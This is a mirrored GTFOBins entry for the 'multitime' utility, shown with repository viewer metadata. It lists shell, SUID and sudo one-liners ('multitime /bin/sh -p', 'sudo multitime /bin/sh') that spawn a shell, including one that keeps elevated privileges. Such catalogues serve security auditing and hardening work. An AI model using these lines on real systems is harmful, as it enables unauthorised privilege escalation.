mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
7cc6a227da
install: apt-get install -y multitime manual: https://manpages.ubuntu.com/manpages/impish/man1/multitime.1.html
10 lines
144 B
Markdown
10 lines
144 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: multitime /bin/sh
|
|
suid:
|
|
- code: ./multitime /bin/sh -p
|
|
sudo:
|
|
- code: sudo multitime /bin/sh
|
|
---
|